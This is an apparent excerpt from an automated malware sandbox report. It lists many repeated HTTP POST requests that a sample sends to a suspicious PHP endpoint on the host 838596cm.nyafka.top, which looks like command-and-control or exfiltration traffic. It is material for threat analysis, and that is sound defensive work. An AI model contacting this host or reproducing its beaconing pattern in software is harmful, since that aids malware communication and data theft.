                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1816Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1816Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1816Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
